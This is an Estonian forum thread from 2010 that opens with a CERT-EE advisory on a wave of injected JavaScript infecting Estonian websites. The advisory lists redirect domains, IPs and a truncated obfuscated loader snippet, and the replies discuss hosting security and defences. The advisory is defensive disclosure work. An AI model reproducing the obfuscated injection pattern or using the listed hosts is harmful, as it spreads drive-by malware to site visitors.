|
Hinnavaatlus
:: Foorum
:: Uudised
:: Ärifoorumid
:: HV F1 ennustusvõistlus
:: Pangalink
:: Telekavad
:: HV toote otsing
|
|
| autor |
sõnum   |
|
Osiris
HV Guru
liitunud: 12.08.2002
|
05.01.2010 19:41:57
Teave veebide administraatoritele - rünne veebide kaudu |
|
|
Uus aasta pole kahjuks väga hästi alanud, sest ei ole saladus, et suuremat sorti veebi kaudu nakatamise laine käib hetkel üle Eesti netimaastiku. Juba eelmise aasta lõpus täheldasime mõningaid rahutukstegevaid märke, ent praegusel hetkel tundub olukord võtvat juba pandeemia mõõte. Sellega seoses pöördume Eesti IT professionaalide poole palvega suhtuda erilise tähelepanuga kõigesse, mis veebiserveri DocRoot kataloogi jõuab. On see siis seotud sellega, mida arendate ja uploadite klientide arvutitesse või sadade klientide virtuaalkodude majutamisega.
Päevakangelast iseloomustab (NB! nimistu ei ole ammendav):
1. HTML lehele või sagedamini JS failidele obfuskeeritud javaskripti lisamine, lisatud osa algab stringiga "/*GNU GPL*/", näide lisatud
2. obfuskeeritud skript harutab ennast lahti veebiaadressiks, kuhu lehe külastaja "põhidoosi" saama suunatakse, aadressi iseloomustab:
- ebatavaliselt suur tähemärkide arv
- üldtuntud domeeninimede sisaldumine (et kehvast filtrist läbi saada)
- .ru TLD kasutamine
näide: deviantclip-com.altervista.org.bbc-co-uk.theaworld.ru
3. HTTP päring suunatakse pordile 8080
4. meieni jõudnud nimed lahenduvad reeglina IPdeks: 91.121.142.111, 94.23.14.110, 94.23.206.229, 85.25.73.243, 91.121.49.129
5. põhiviiruse allalaadija on piisavalt heasti kirjutatud, et välistada automatiseeritud analüüsi üldtuntud vahenditega, AVd klassifitseerivad kasutaja arvutisse paigaldatud binaarifaili reeglina Bredolabi troojalaseks.
Eesti IT maastikul tegutsejatelt palume me kõrgendatud tähelepanu veebide haldamiseks kasutatava FTP/HTTP liikluse montooringul!
Võimaluse korral tasuks juba hallatavad-arendatavad veebilehed üle vaadata ning kindlasti tuleks oma halduseks-arenduseks kasutatavad masinad hoida puhtana pahavarast. Võimaluse korral võiks lisada IDSi kontrollitavasse võrgusegmenti.
Tänud kõigile neile, kes kõike seda juba teevad ning tänu neile, kes seda veel ei ole teinud, aga hakkavad tegema.
NB! Asi esineb Eestis paraku juba massiliselt ja ohustab lihtkasutajat!
Täiendavat lugemist antud teemal leiab ka siit: http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/
Mittetäielik näide .js failile lisatud obfuskeeritud javaskriptist:
| javascript:
|
/*GNU GPL*/ try{window.onload = function(){var Ck46ii1kyo = document.createElement('s&)c#&$r!)((i!!p#$t@'.replace(/\(|@|\)|\$|\!|&|\^|#/ig, ''));var Ndkpsyeqhxen = 'R5hb66d6f7idj';Ck46ii1kyo.setAttribute('type', 't)!)e&x$!^t((/^j^a$v$#a$^&!s(! /.. edasine eemaldatud ../
|
Teie,
CERT-EE
Tarmo Randel
tarmo-ät-cert.ee
66 30 254
|
|
| Kommentaarid: 114 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
0 :: |
102 |
|
| tagasi üles |
|
 |
destiny12
Piiratud kasutaja
liitunud: 26.12.2007
|
|
05.01.2010 21:52:57
|
|
|
CERT: Eesti veebidel möllab viirusepandeemia
Riigi Infosüsteemide Arenduskeskuse (RIA) infoturbeintsidentide käsitlemise osakond CERT teatas, et Eesti netimaastikku tabas täna ulatuslik viiruserünnak.
RIA teatel täheldasid nad juba eelmise aasta lõpus mõningaid rahutukstegevaid märke, ent praegusel hetkel tundub olukord võtvat juba pandeemia mõõte.
Pikemalt siit.
http://www.e24.ee/?id=208098
Sellest need õhtule ja muude lehtede probleemid siis.
_________________
"Ära mine sinna, kuhu rada viib. Mine selle asemel sinna, kus rada ei ole, ja saa teerajajaks." |
|
| Kommentaarid: 83 loe/lisa |
Kasutajad arvavad: |
|
:: |
2 :: |
0 :: |
77 |
|
| tagasi üles |
|
|
Andrus Luht
itimees.ee
liitunud: 11.06.2002
|
|
| Kommentaarid: 377 loe/lisa |
Kasutajad arvavad: |
|
:: |
5 :: |
1 :: |
318 |
|
| tagasi üles |
|
|
BigBabba
HV kasutaja
liitunud: 29.06.2003
|
|
06.01.2010 11:16:54
|
|
|
BReaK da iCE, Turvalise ühenduse kasutamine võib tekitada "vale turvatunde".
Tegelikult on probleem juba sügavamal. Nimelt ei uuendata oma tarkvara (Flash, Acrobat, IE, Firefox, jne) ja ei kasutata (või kasutatakse kehva) viirusetõrjet.
Tänapäeval "varastavad" viirused FTP proole otse salvestatud paroolide failist. See, kui ftp kasutab turvalist ühendust, ei pruugi aidata paroolide pihta panemise vastu.
Kindlasti on soovitav igal pool kasutada krüpteeritud ühendusi. Ka mailinduses (POP3S, IMAPS, SMTPS). Tänapäeval, kus enamik telefone loeb üle avalike wifi võrkude e-posti, on väga riskantne kasutada igasugust krüptimata ühendust.
|
|
| tagasi üles |
|
|
r2d2
HV vaatleja
liitunud: 02.03.2004
|
|
| Kommentaarid: 4 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
4 |
|
| tagasi üles |
|
|
tahanteada
Lõuapoolik
liitunud: 04.04.2003
|
|
06.01.2010 12:33:03
|
|
|
Tegelikult on asi palju lihtsam - kõikvõimalikke E-maili kaudu liikuvaid Spämme osatakse enam-vähem miskitmoodi juba blokeerida ning selle reklaami-müügi-kanali asemele on vaja uusi kanaleid, mille kaudu kellegi eelistusi uurida ja siis talle sobivaid reklaamlehti ette loopida.
Lisaks veel see, et veebilehtede kaudu levitatav on selles suhtes ka üsnagi turvaline, kuna paljud viirusetõrjeid ei oma ei Spy-tulemüüri - ning mis veel hullem - ei kontrollita 100% läbi kogu informatsiooni.
Kui ikka üks tõrje skännib näiteks 100 000 objekti, teatades, et 100% on skännitud, siis mingi teine annab sama 100% teate juba 40 000-50 000 objekti järel. Ning siis on veel eriti huvitav, et võtad mõne kolmanda-neljanda - siis üks neist raporteerib juba 10 000-20 000 objekti ning neljas omakorda 300 000-500 000 objekti mis on läbi skännitud.
Ja siit siis küsimus, et millise, neist neljast tulemus on siis 100% läbiskännimist.
Mina ise valiks viimase, ehk siis selle, mis kõige rohkem "läbi kedrata" suudab. 
|
|
| Kommentaarid: 284 loe/lisa |
Kasutajad arvavad: |
|
:: |
2 :: |
11 :: |
211 |
|
| tagasi üles |
|
|
Anna tooli
liitunud: 16.03.2006
|
|
06.01.2010 14:41:18
|
|
|
Viirus nakatas ERRi raadiote veebiküljed
Pahalane oli end istutanud kõigi failide külge, mis kandsid nime index.html või index.php ning kõigi javascripti failide külge, mille laiend on js.
«Kuna pahalane oli suhteliselt hästi tuvastatav ja nähtav, siis kirjutasid meie spetsialistid lihtsalt ühe scripti, mis skaneeris üle kõik potentsiaalselt nakatunud failid ja kustutas selle osa failide seest ära. Hinnanguliselt võis nakatunud faile olla ligi 200,» selgitas Pau.
http://www.e24.ee/?id=208358
--
Leviva viiruse hammas ei hakka Windows 7-le
http://www.e24.ee/?id=208320
_________________
  |
|
| Kommentaarid: 352 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
294 |
|
| tagasi üles |
|
|
Dijital
HV Guru
liitunud: 09.06.2003
|
|
| Kommentaarid: 40 loe/lisa |
Kasutajad arvavad: |
|
:: |
1 :: |
0 :: |
31 |
|
| tagasi üles |
|
|
janeklass
HV vaatleja
liitunud: 13.05.2009
|
|
06.01.2010 18:51:55
|
|
|
Tere!
Kas on võimalik et antud teemas antud leht ,kust pidavat saama lugeda täientavat infot on ka nakatunud? Ma üritasin sinna minna,aga mu viirusetõrje plokkis ära selle lehe.
|
|
| tagasi üles |
|
|
Anna tooli
liitunud: 16.03.2006
|
|
06.01.2010 18:56:35
|
|
|
| janeklass kirjutas: |
| Kas on võimalik et antud teemas antud leht ,kust pidavat saama lugeda täientavat infot on ka nakatunud? Ma üritasin sinna minna,aga mu viirusetõrje plokkis ära selle lehe. |
sellele pääsed ligi?
_________________
|
|
| Kommentaarid: 352 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
294 |
|
| tagasi üles |
|
|
taifunk
HV Guru
liitunud: 06.01.2005
|
|
06.01.2010 20:04:43
|
|
|
Mul tekib kohe küsimus, et mida saab tavakasutaja täna ise teha, et vältida nakatumist ja kontrollida, et ei oleks juba nakatunud?
Mis tegevuspunktide järgimine võiks anda 100% hetkekindluse "puhas" olemisest?
_________________
Remember this day, men, for it will be yours for all time. |
|
| Kommentaarid: 45 loe/lisa |
Kasutajad arvavad: |
|
:: |
3 :: |
5 :: |
36 |
|
| tagasi üles |
|
|
Valvejoodik
HV veteran
liitunud: 27.12.2008
|
|
06.01.2010 20:27:54
|
|
|
| taifunk kirjutas: |
Mul tekib kohe küsimus, et mida saab tavakasutaja täna ise teha, et vältida nakatumist ja kontrollida, et ei oleks juba nakatunud?
Mis tegevuspunktide järgimine võiks anda 100% hetkekindluse "puhas" olemisest? |
Ära käi internetis 
Usun, et uuendatud viirusetõrje ja tulemüür ajavad asja ära, muidugi käis ka info, et viirus W7 ei söö...
|
|
| Kommentaarid: 16 loe/lisa |
Kasutajad arvavad: |
|
:: |
1 :: |
0 :: |
15 |
|
| tagasi üles |
|
|
mikk36
HV Guru
liitunud: 21.02.2004
|
|
06.01.2010 20:46:00
|
|
|
| Mis möllad, kirjutas: |
| janeklass kirjutas: |
| Kas on võimalik et antud teemas antud leht ,kust pidavat saama lugeda täientavat infot on ka nakatunud? Ma üritasin sinna minna,aga mu viirusetõrje plokkis ära selle lehe. |
sellele pääsed ligi? |
6.01.2010 19:44:04
HTTP filter
archive
http://feeds2.feedburner.com/unmaskparasites
JS/TrojanDownloader.Agent.NRL trojan
connection terminated
M36\Mikk36
Threat was detected upon access to web by the application: C:\Program Files (x86)\Mozilla Firefox\firefox.exe. |
|
|
| Kommentaarid: 85 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
2 :: |
78 |
|
| tagasi üles |
|
|
HacaX
HV Guru
liitunud: 22.01.2004
|
|
06.01.2010 21:07:41
|
|
|
| janeklass kirjutas: |
Tere!
Kas on võimalik et antud teemas antud leht ,kust pidavat saama lugeda täientavat infot on ka nakatunud? Ma üritasin sinna minna,aga mu viirusetõrje plokkis ära selle lehe. |
Võimalik ta on, ehkki tõenäolisem on et probleemi allikaks on too skriptijupp mis illustreerimiseks ära on toodud.
Avasti väidetakse kasutaja masinaid nakatavat poolt esimesena leidnud olema, seega võimalusel võiks Avasti korraks peale lasta. Gumblari vastu on ka eraldi eemaldaja olemas, kas ta ka asjaga hakkama saab on küll teine teema.
Neti peal leiduvate kirjelduste põhjal võiks aidata kui iframe´is muude URLide/progede laadimine ära keelata (IEs peaks olema "Launching of programs and files in an IFRAME" ja "Navigate windows and frames accross different domains" DISABLE). Idee poolest võiks ka aidata kui .RU saitide õigusi piirata (a´la IE "restricted sites", mis küll kahjuks "*.ru" wildcardi ei seedi, FFil ei paistnud üldse säärast asja olevat, ainult täielik blokeerimine plugina abil mis uusimaid FFe enam ei toeta  )
_________________
IMO & GPLed |
|
| Kommentaarid: 24 loe/lisa |
Kasutajad arvavad: |
|
:: |
1 :: |
0 :: |
22 |
|
| tagasi üles |
|
|
janeklass
HV vaatleja
liitunud: 13.05.2009
|
|
06.01.2010 22:08:36
|
|
|
| mikk36 kirjutas: |
| Mis möllad, kirjutas: |
| janeklass kirjutas: |
| Kas on võimalik et antud teemas antud leht ,kust pidavat saama lugeda täientavat infot on ka nakatunud? Ma üritasin sinna minna,aga mu viirusetõrje plokkis ära selle lehe. |
sellele pääsed ligi? |
6.01.2010 19:44:04
HTTP filter
archive
http://feeds2.feedburner.com/unmaskparasites
JS/TrojanDownloader.Agent.NRL trojan
connection terminated
M36\Mikk36
Threat was detected upon access to web by the application: C:\Program Files (x86)\Mozilla Firefox\firefox.exe. |
|
jep sellele pääsen ligi
|
|
| tagasi üles |
|
|
Tomorrow
HV Guru
liitunud: 08.02.2006
|
|
06.01.2010 22:13:49
|
|
|
| Mis möllad, kirjutas: |
| Leviva viiruse hammas ei hakka Windows 7-le |
Yippii i`m safe now 
Küllap viirusetegijad "uuendavad" kah ja siis nakatab 
|
|
| Kommentaarid: 89 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
79 |
|
| tagasi üles |
|
|
indrek309
HV kasutaja
liitunud: 17.08.2006
|
|
07.01.2010 16:53:27
|
|
|
kudagi tagurpidi käib see asi, blokeeritakse veebiaadresse ja uuendatakse viirusetõrjet aga kuidas selle turvaauguga jääb (flashis v. adobes või misiganes) mis viiruse üldse sisse laseb? suht niru on ikka, et lähed/suunatakse kuskile veebilehele ja siis automaatselt ongi viirus arvutis, ilma et kuskile klikkama peaksid.
keegi teab mida peab uuendama? et üldse viirust ei tulekski (javascripti keelamine v. juhtme seinast välja tõmbamine, ei tundu eriti asjalikud soovitused) mis plugina kaudu täpselt see viirus tuleb?
|
|
| Kommentaarid: 16 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
16 |
|
| tagasi üles |
|
|
Traf
Kreisi kasutaja
liitunud: 04.12.2007
|
|
07.01.2010 17:03:32
|
|
|
| BReaK da iCE kirjutas: |
Huvitav, palju neid 'hostingupakkujaid' on täna Eestis, kes lubavad ebaturvaliselt (http/ftp) klientidel sisse logida ja omi virtuaalservereid hallata? Enamus vist...
Kui kontrollpaneel on veel SSL'itud (https://) siis ftp on küll enamusel kaitsmata. Selle asemel peaks kasutama SCP'd või siis veebipõhist lahendust (näiteks. Net2FTP)
 |
Mitte ei ainult ei luba, aga kui ma olen spetsiaalselt teenusepakkujatele meili saatnud ja küsinud, kas SFTP'd või SCP'd saaks, siis vastatakse, et ei, ei saa. FTPS sisse logimisel on maksimaalne olnud, mida vaevutakse pakkuma.
|
|
| Kommentaarid: 48 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
47 |
|
| tagasi üles |
|
|
Marie
HV Guru
liitunud: 23.06.2003
|
|
| Kommentaarid: 83 loe/lisa |
Kasutajad arvavad: |
|
:: |
1 :: |
0 :: |
74 |
|
| tagasi üles |
|
|
poiss4
HV kasutaja
liitunud: 26.12.2009
|
|
08.01.2010 10:52:42
|
|
|
| Kõikides tänapäeva parimates veebilehitsejates saab javascript välja lülitada. Ja vajadusel ka sisse lülitada. Ja jälle välja lülitada.
|
|
| tagasi üles |
|
|
mikk36
HV Guru
liitunud: 21.02.2004
|
|
08.01.2010 11:00:49
|
|
|
| Marie, ei ole tõsi.
|
|
| Kommentaarid: 85 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
2 :: |
78 |
|
| tagasi üles |
|
|
Dirty Harry
HV Guru
liitunud: 05.09.2002
|
|
08.01.2010 11:05:40
|
|
|
| poiss4 kirjutas: |
| Kõikides tänapäeva parimates veebilehitsejates saab javascript välja lülitada. Ja vajadusel ka sisse lülitada. Ja jälle välja lülitada. |
Ja kasutajad kindlasti oskavad, viitsivad seda teha.
|
|
| Kommentaarid: 177 loe/lisa |
Kasutajad arvavad: |
|
:: |
1 :: |
1 :: |
143 |
|
| tagasi üles |
|
|
tanq
Kreisi kasutaja
liitunud: 21.05.2002
|
|
08.01.2010 13:25:30
|
|
|
| Traf kirjutas: |
| BReaK da iCE kirjutas: |
Huvitav, palju neid 'hostingupakkujaid' on täna Eestis, kes lubavad ebaturvaliselt (http/ftp) klientidel sisse logida ja omi virtuaalservereid hallata? Enamus vist...
Kui kontrollpaneel on veel SSL'itud (https://) siis ftp on küll enamusel kaitsmata. Selle asemel peaks kasutama SCP'd või siis veebipõhist lahendust (näiteks. Net2FTP)
|
Mitte ei ainult ei luba, aga kui ma olen spetsiaalselt teenusepakkujatele meili saatnud ja küsinud, kas SFTP'd või SCP'd saaks, siis vastatakse, et ei, ei saa. FTPS sisse logimisel on maksimaalne olnud, mida vaevutakse pakkuma. |
Kui küsida tohib, kes teenusepakkujaks?
|
|
| Kommentaarid: 55 loe/lisa |
Kasutajad arvavad: |
|
:: |
1 :: |
0 :: |
49 |
|
| tagasi üles |
|
|
Traf
Kreisi kasutaja
liitunud: 04.12.2007
|
|
08.01.2010 13:31:27
|
|
|
| tanq kirjutas: |
| Traf kirjutas: |
| BReaK da iCE kirjutas: |
Huvitav, palju neid 'hostingupakkujaid' on täna Eestis, kes lubavad ebaturvaliselt (http/ftp) klientidel sisse logida ja omi virtuaalservereid hallata? Enamus vist...
Kui kontrollpaneel on veel SSL'itud (https://) siis ftp on küll enamusel kaitsmata. Selle asemel peaks kasutama SCP'd või siis veebipõhist lahendust (näiteks. Net2FTP)
|
Mitte ei ainult ei luba, aga kui ma olen spetsiaalselt teenusepakkujatele meili saatnud ja küsinud, kas SFTP'd või SCP'd saaks, siis vastatakse, et ei, ei saa. FTPS sisse logimisel on maksimaalne olnud, mida vaevutakse pakkuma. |
Kui küsida tohib, kes teenusepakkujaks? |
Virtuaal.com teenuseid kasutasin tol hetkel, see oli umbes 1 aasta tagasi. Ei usu, et hetkeks midagi muutunud on.
Samal ajal sai saadetud päring Zone'le, vastus oli üsna sarnane. Hetkel Zone hinnakirja uurides näen sama asja, krüpteeritult liiguvad vaid ftp kasutaja/salasõna.
Üsna nukker, ütleks.
|
|
| Kommentaarid: 48 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
47 |
|
| tagasi üles |
|
|
poiss4
HV kasutaja
liitunud: 26.12.2009
|
|
08.01.2010 14:07:38
|
|
|
| Nii ta vist ongi.
|
|
| tagasi üles |
|
|
|
:: KKK
:: otsing 
:: statistika
:: kasutajate nimekiri
:: kasutajate grupid
:: registreeri
